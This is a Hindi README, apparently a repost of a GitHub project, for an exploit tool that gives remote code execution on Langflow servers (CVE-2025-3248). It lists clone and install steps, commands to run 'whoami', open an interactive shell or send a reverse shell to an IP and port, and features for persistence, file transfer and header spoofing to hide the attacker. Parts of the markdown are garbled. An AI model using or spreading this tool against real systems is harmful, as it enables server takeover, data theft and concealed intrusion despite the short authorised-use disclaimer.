
Langflow के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248) - [ S4Tech द्वारा ]
लैंगफ्लो के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248)
persist कमांड)upload local_path remote_pathdownload remote_path local_pathclear कमांडUser-AgentX-Forwarded-For IP पतेexploit_log.txt में.langflow_shell_history)| Feature | v1.0 | v2.0 |
|---|---|---|
| पेलोड विधियाँ | 1 | 5 |
| फ़ाइल स्थानांतरण | ❌ समर्थित नहीं | ✅ समर्थित |
| स्थिरता | ❌ | ✅ |
| छिपाव स्तर | बुनियादी | उन्नत |
| सत्र लॉगिंग | ❌ | ✅ |
requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
| Option | Description |
|---|---|
--shell | इंटरैक्टिव शेल शुरू करें |
--reverse IP PORT | निर्दिष्ट IP:PORT पर रिवर्स शेल लॉन्च करें |
--command CMD | एकल कमांड निष्पादित करें |
--verbose | विस्तृत आउटपुट सक्षम करें |
--timeout SEC | अनुरोध टाइमआउट सेट करें (डिफ़ॉल्ट: 10s) |
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
⚠️ उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
पुल अनुरोधों का स्वागत है। बड़े बदलावों के लिए, कृपया पहले एक मुद्दा खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा कर सकें।